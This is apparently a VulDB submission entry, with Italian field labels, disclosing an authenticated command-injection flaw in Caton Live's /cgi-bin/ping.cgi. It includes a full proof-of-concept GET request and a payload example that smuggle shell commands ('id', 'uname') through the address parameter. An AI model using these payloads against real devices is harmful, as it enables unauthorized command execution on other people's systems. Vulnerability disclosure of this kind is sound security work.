| Titolo | Caton Live Unknown Version - Command Injection Authenticated |
|---|
| Descrizione | # Date: 2023-04-26
# Exploit Author: Fabio C. Premoli e Claudio J. R. Ferreira
# Vendor Homepage: https://www.catontechnology.com/
# Software Link: https://www.catontechnology.com/en/products/video-processors/encoders-decoders/caton-live
# Version: unknown
# Tested on: Linux
Description:
Command injection vulnerability is a security hole in a system or application that allows an attacker to execute commands on a remote device or system. This can be due to programming errors, incorrect settings, or failed input validation. Once this vulnerability is exploited, an attacker could gain privileged access to the system and perform malicious actions, such as stealing confidential data, spreading malware, or disrupting system operation. It is important to keep systems and applications updated and properly configured to protect against command injection vulnerabilities.
Vulnerability was found in Caton Live in the Mini_HTTPD 1.27 version through ICMP Package Shipping functionality to an IP, known as Ping.CGI. Because of a lack of sanitization in the Address parameter, you can create a code to receive a target connection by bringing access to Shell.
Proof of Concept:
Request:
GET /cgi-bin/ping.cgi?address=localhost;id HTTP/1.1
Host: TARGET
Authorization: Basic <BASICTOKEN>
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
token: <AUTHTOKEN>
Referer: http://TARGET
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR, pt;q=0.9, en-US;q=0.8,en;q=0.7
Connection: close
Vulnerability Disclosure Schedule:
* November 2022: The vulnerability was found.
* Jan 11, 2023: An email was sent to support with a 3 month deadline for disclosure.
* April 26, 2023: I have not received any response from support.
Technical Details:
Version affected: Mini_HTTPD 1.27
Endpoint: /cgi-bin/ping.cgi
Parameter: address
Payload example: /cgi-bin/ping.cgi?address=;id;uname${IFS}-a
Method: GET |
|---|
| Fonte | ⚠️ https://www.catontechnology.com/en/products/video-processors/encoders-decoders/caton-live |
|---|
| Utente | premoli (UID 45762) |
|---|
| Sottomissione | 26/04/2023 16:23 (3 anni fa) |
|---|
| Moderazione | 12/05/2023 14:17 (16 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 228911 [Caton Live fino a 2023-04-26 Mini_HTTPD /cgi-bin/ping.cgi address escalationi di privilegi] |
|---|
| Punti | 20 |
|---|